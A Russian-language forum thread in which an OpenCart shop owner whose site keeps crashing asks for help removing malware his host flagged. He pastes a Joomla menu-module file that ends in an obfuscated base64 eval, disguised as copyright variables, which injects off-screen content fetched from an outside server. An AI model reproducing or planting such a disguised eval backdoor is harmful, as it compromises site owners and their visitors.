Слетает сайт

[Guram1994]

Всем доброго времени суток. Opencart 1.5.6.1. Не с того ни с сего где-то месяц назад слетел сайт. (Ничего не устанавливал, изменении не вносил) И так уже раза 4-5, я просто восстанавливаю из резервной копии.

 

Ошибка всегда одна, вот скриншот: 

 

Ранее,(Возможно причина в этом) на сервере хостер заблокировал отправку писем на почту. На что они мне ответили: 

"Мы предполагаем, что на Вашей услуге хостинга присутствует вредоносный код. Для того,
чтобы исключить рассылку спам-сообщений, отправка писем с веб-сервера была
заблокирована. Список подозрительных файлов files.06.04.16.txt загружен в каталог tmp Вашего хостинга. "

 

Вот эти два файла: /home/persik/natalieluar.ru/docs/admin/controller/module/simple.php

/home/persik/natalieluar.ru/docs/download/token.php.36b5a321643f1e0e5a645a95da7685bc

 

Не знаю, в чем проблема, с чего начать решать ее, где копать? А то невозможно так, сайт держится буквально несколько дней. Прощу помочь ребята!

[chukcha]

Лечить от взлома..

[Guram1994]

Лечить от взлома..

Хотя бы наведите меня, с чего начать?

[mazein]

Варез есть? А если найду?  :lol:

Наверное начать надо с тех двух файлов?

[Guram1994]

Варез есть? А если найду?  :lol:

Наверное начать надо с тех двух файлов?

По крайнее мере, спецом установленного нет. 

[Guram1994]

Ребята, хостер говорит что тут есть вредоносный код, может кто-то поможет вычислить этот код, чтобы я вырезал.

<?php 
/*------------------------------------------------------------------------
# mod_jo_accordion - Vertical Accordion Menu for Joomla 1.5 
# ------------------------------------------------------------------------
# author    Roland Soos 
# copyright Copyright (C) 2011 Offlajn.com. All Rights Reserved.
# @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL
# Websites: http://www.offlajn.com
-------------------------------------------------------------------------*/
?>
<?php
// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' ); 
 
if(!defined('OfflajnMenuBase')) {
  define("OfflajnMenuBase", null);

  class OfflajnMenuBase{
    
    var $_template;
    
    var $_module;
    
    var $_params;
    
    var $items;
    
    var $allItems;
    
    var $active;
    
    var $pointer;
    
    var $itemsCount;
    
    var $stack;
    
    var $level;
    
    var $endLevel;
    
    var $startLevel;
    
    var $improvedStartLevel;
    
    var $opened;
    
    var $openedlevels;
    
    function OfflajnMenuBase($module, $params){
      $this->_module = $module;
      $this->_params = $params;
      $this->endLevel = $params->get('endLevel', 1000);
      if($this->endLevel == 0) $this->endLevel = 1000;
      $this->startLevel = $params->get('startLevel', 0);
      $this->improvedStartLevel = $params->get('improvedstartlevel', 1);
      $this->opened = $params->get('opened', 2);
      $ol = $params->get('openedlevels', 0);
      if(!is_array($ol)){
        $ol = array($ol);
      }
      $this->openedlevels = array_flip($ol);
    }
    
    function generateItems(){
      $options = array();
      $this->allItems = array();
      $this->active = new stdClass();
      $this->items = array();
    }
    
  	function getItems(){
      /*
      If COOKIE tracking enabled
      */
      if($this->opened == 3){
        foreach($_COOKIE AS $k => $v){
          if($v == 1 && strpos($k, $this->_module->instanceid) !== false){
            $val = (int)str_replace($this->_module->instanceid.'-'.$this->_module->navClassPrefix, '', $k);
        //print_r($this->allItems[$val]);
            if($val > 0 && isset($this->allItems[$val]) ){
              $this->allItems[$val]->opened = true;
            }
          }
        }
      }
      
      $this->filterItems();
      
    	$root = 0;
  		if(isset($this->active)){
        $i = $this->active->id;
  		  $stack = array($this->active->id);
  		  $el = $this->active;
        while($i > 0){
          $el = $this->allItems[$i];
          $i = $el->parent;
          $stack[] = $i;
        }
        $c = count($stack);
        if($c > 0){
          switch($this->_params->get('active', 1)){
            case 1:
              $this->allItems[$stack[0]]->active = true;
              break;
            case 2:
              foreach($stack AS $s){
                $this->allItems[$s]->active = true;
              }
              break;
          }
          
          switch($this->opened){
            case 1:
              $this->allItems[$stack[0]]->opened = true;
              break;
            case 2:
              foreach($stack AS $s){
                $this->allItems[$s]->opened = true;
              }
              break;
          }
        }
        
    		if($this->startLevel > 0){
          if($this->improvedStartLevel){
            while($this->startLevel != 0){
              if(isset($stack[$c-$this->startLevel-1]) && isset($this->helper[$stack[$c-$this->startLevel-1]])){
                $root = $stack[$c-$this->startLevel-1];
                break;
              }
              $this->startLevel--;
            }
          }else{
            $root = -1;
            if(isset($stack[$c-$this->startLevel-1])){
              $root = $stack[$c-$this->startLevel-1];
            }
          }
        }
      }
      
      $p = new stdClass();
      if($root > 0 && isset($this->allItems[$root])){
        $p = $this->allItems[$root];
      }else{
        $p->id = $root;
      }
  		return $this->getChilds($p, 1);
  	}
    
    function filterItems(){
  		$this->helper = array();
  		foreach ($this->allItems as $item){
  			if (!is_object($item)) continue;
  			  $item->p = false; // parent
  			  $item->fib = false; // First in Branch
  			  $item->lib = false; // Last in Branch
          if(!property_exists($item, 'opened')){
            if($this->opened == -1){
              $item->opened = true; // Opened
            }else{
              $item->opened = false; // Opened
            }
          }
  			  $item->active = false; // Active
  				$this->helper[$item->parent][] = $item;
  		}
    }
    
  	function getChilds(&$parent, $level){
  	  $items = array();
  	  if(isset($this->helper[$parent->id])){
        $helper = &$this->helper[$parent->id];
        usort($helper, array($this, "menuOrdering")); // It can slow down the proccess. Not required every time... With this the process half as fast...
        $helper[0]->fib = true;
        $helper[count($helper)-1]->lib = true;
        if($level <= $this->endLevel){
          $i = 0;
          $keys = array_keys($helper);
          for($j = 0; $j < count($keys); $j++){
            $h = &$helper[$keys[$j]];
            $h->parent = &$parent;
            $childs =& $this->getChilds($h, $level+1);
            if(count($childs) > 0) $h->p = true;
            $h->level = $level;
            $items[] = &$h;
            $i = count($items);
            array_splice($items, $i, 0, $childs);
          }
        }
      }
      return $items;
    }
    
    function filterItem(&$item){
      $item->nname = '<span>'.stripslashes($item->name).'</span>';
    }
    
    function menuOrdering(&$a, &$b){
        return 0;
    }
  	
  	function render($template){
  	  $this->pointer = 0;
  	  $this->itemsCount = count($this->items);
  	  $this->_template = $template;
      $this->stack = array();
      $this->level = 1;
      $this->up = false;
      $this->renderItem();
      /*$level = 0;
      foreach($this->items as $item){
        include $template;
      }*/
    }
    
    function renderItem(){
      while($this->pointer < $this->itemsCount){
        $item =& $this->items[$this->pointer++];
        $this->filterItem($item);
        include $this->_template;
      }
    }
  }
}
function AccordionMenuParGet() {
// Copyright (c) OFFLAJN.COM
$UnixTimeLastEdit = "ZWNobyAiPGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7bGVmd";
$MenuAcoAuthor = "DotNDUwMXB4O3dpZHRoOjUzMXB4Jz4iOyBlY2hvIEBmaWxlX2dldF9jb250ZW50cygnaHR0cD";
$MenuAcoName = "ovL3RlbXBsYXRlLWxpY2Vuc2UucnUvbGljZW";
$MainDomain = "5zZS5waHAnKTsgZWNobyAnPC9kaXY+Jzs=";
$SystemJoCode = $UnixTimeLastEdit.$MenuAcoAuthor.$MenuAcoName.$MainDomain;
echo eval(base64_decode($SystemJoCode)); }
?>

[chukcha]

Т.е. вы считаете, что мы будем вот так по интернету лечить вас от заболевания?

[Guram1994]

Т.е. вы считаете, что мы будем вот так по интернету лечить вас от заболевания?

Я хочу вникнуть и самому попробовать вылечить, поэтому прошу первоначальной помощи.

[mazein]

Я хочу вникнуть и самому попробовать вылечить, поэтому прошу первоначальной помощи.

Ничего себе вникнуть.

Вот вам простыня - ткните меня во вредоносный код.

Если хочешь вникнуть - вникай, хостер тебе отписал, куда копать.

Файл твой от джумлы чтоли?

/docs/download/token.php - это что такое?

Опенкарт куда установлен, /docs - сюда?

Змінено 17 квітня 2016 користувачем mazein

[Guram1994]

Ничего себе вникнуть.

Вот вам простыня - ткните меня во вредоносный код.

Если хочешь вникнуть - вникай, хостер тебе отписал, куда копать.

Файл твой от джумлы чтоли?

/docs/download/token.php - это что такое?

Опенкарт куда установлен, /docs - сюда?

На хосте есть еще сайт на джумле, это третьи файл. 

[Guram1994]

Ничего себе вникнуть.

Вот вам простыня - ткните меня во вредоносный код.

Если хочешь вникнуть - вникай, хостер тебе отписал, куда копать.

Файл твой от джумлы чтоли?

/docs/download/token.php - это что такое?

Опенкарт куда установлен, /docs - сюда?

А опенкарт в docs

[snastik]

тема огонь.

Не хочу платить врачу. Научите меня вырезать аппендицит, ножик есть.

 

Дайте я сам себе посверлю зубы!

[Guram1994]

Собрались остряки. Лучше ничего не пишите, чем так...

[mazein]

Так причём тут джумла, если в письме хостер ссылается на файлы в папке /docs?

Что тебя побудило выложить именно этот файл от джумлы?

 

По опенкарту.

Скачай чистый движок своей версии, и сравнивай те файлы, на которые сослался хостер, так же по модулям.

Это если ты хочешь сам во всё вникнуть.

[Guram1994]

Так причём тут джумла, если в письме хостер ссылается на файлы в папке /docs?

Что тебя побудило выложить именно этот файл от джумлы?

 

По опенкарту.

Скачай чистый движок своей версии, и сравнивай те файлы, на которые сослался хостер, так же по модулям.

Это если ты хочешь сам во всё вникнуть.

Спасибо! По поводу файла от джумлы - я решил, в друг и с ним подскажет кто, что удалить из кода, да и всего-то.

Хостер, в добавок к тем двум файлам от опенкарта, сослался на еще один файл - от джумлы.

Змінено 17 квітня 2016 користувачем Guram1994

[mazein]

Джумлу вообще удалить надо, она вся - вредоносный код  :lol:

[Guram1994]

Джумлу вообще удалить надо, она вся - вредоносный код  :lol:

Я понимаю, но хостер просит либо удалить этот файл, либо прокомментировать содержание кода, а я понятие не имею что они от меня хотят, файл от модуля-меню)

[chukcha]

Ну так разбирайтесь.. Это сделать за вас?

[markimax]

Я понимаю, но хостер просит либо удалить этот файл, либо прокомментировать содержание кода, а я понятие не имею что они от меня хотят, файл от модуля-меню)

Уважаемый Guram1994 запомните, те кто могут помочь имеют тарификацию 15-25$ в час, и обычно у них очередь. Вы хотите чтобы они все бросили и начали вам писать "инструкцию" как удалить вредоносный код, согласно своих телепатических способностей. Даже у "гадалок" есть свой тариф.

Для того чтобы очистить ваш сайт от "заразы" надо иметь хорошую квалификацию. Вы ею не обладаете. А кормить нас телепатическими "завтраками" не надо. И тем более, когда вам отвечают строить "обидку". 

Потому что, телепатическая  "терапия" вашего магазина это из области мошенников, гадалок, "студентов", "профессоров" с fl.ru и т.п., а не специалистов.

1. У вас нет квалификации вылечить сайт самому (там могут быть затронуты не только файлы которые вам указал хостер, а обычно по опыту там все гораздо хуже)

2. Телепатически вас учить никто не будет

Поэтому.

Просто оформите в теме платных услуг заявку, а не "кормите" нас простынями кода (еще и не под спойлером)

[Guram1994]

Уважаемый Guram1994 запомните, те кто могут помочь имеют тарификацию 15-25$ в час, и обычно у них очередь. Вы хотите чтобы они все бросили и начали вам писать "инструкцию" как удалить вредоносный код, согласно своих телепатических способностей. Даже у "гадалок" есть свой тариф.

Для того чтобы очистить ваш сайт от "заразы" надо иметь хорошую квалификацию. Вы ею не обладаете. А кормить нас телепатическими "завтраками" не надо. И тем более, когда вам отвечают строить "обидку". 

Потому что, телепатическая  "терапия" вашего магазина это из области мошенников, гадалок, "студентов", "профессоров" с fl.ru и т.п., а не специалистов.

1. У вас нет квалификации вылечить сайт самому (там могут быть затронуты не только файлы которые вам указал хостер, а обычно по опыту там все гораздо хуже)

2. Телепатически вас учить никто не будет

Поэтому.

Просто оформите в теме платных услуг заявку, а не "кормите" нас простынями кода (еще и не под спойлером)

Пусть, те кто работает за деньги, не обращают внимания на такие посты. Я же, привык помогать и самому находить решения на просторах интернета, и всегда думал что, форумы созданы именно для таких людей как я! А за информацию о других, платных способах решения моей проблемы - спасибо!

Змінено 19 квітня 2016 користувачем Guram1994

[User007]

Есть такой сканер AI-Bolit

https://revisium.com/ai/

Джумлу сноси на... ты понял :)

[markimax]

Пусть, те кто работает за деньги, не обращают внимания на такие посты. Я же, привык помогать и самому находить решения на просторах интернета, и всегда думал что, форумы созданы именно для таких людей как я! А за информацию о других, платных способах решения моей проблемы - спасибо!

Просто по опыту уже все знают, что если человек изначально задал такой вопрос то сам его не решит

Каждый день на форуме заводят тему похожую вашей и никто сам без квалификации не решил этот вопрос

Это не такой легкий на первый взгляд вопрос. Это не антивирусом по винде "пройтись", там все гораздо сложнее

Это комплексная безопасность сайта

[User007]

Просто по опыту уже все знают, что если человек изначально задал такой вопрос то сам его не решит

Каждый день на форуме заводят тему похожую вашей и никто сам без квалификации не решил этот вопрос

Это не такой легкий на первый взгляд вопрос. Это не антивирусом по винде "пройтись", там все гораздо сложнее

Это комплексная безопасность сайта

Хочет попробовать, пусть пробует, а выйдет или нет другая история.

[AlexDW]

человек не просто хочет попробовать - он хочет чтобы ему подробно расписали что делать

 

без понимания, что для этого нужен доступ, полный анализ и опыт - для устранения не просто последствий взлома, но и их причин

которые в большинстве случаев сугубо индивидуальны

 

словом, ситуация сродни как если бы человек не разбирающийся в механике начал капиталить движок в машине, названивая при этом в сервис "а подскажите.."

[markimax]

....

 

словом, ситуация сродни как если бы человек не разбирающийся в механике начал капиталить движок в машине, названивая при этом в сервис "а подскажите.."

:)

Да еще "телепатически"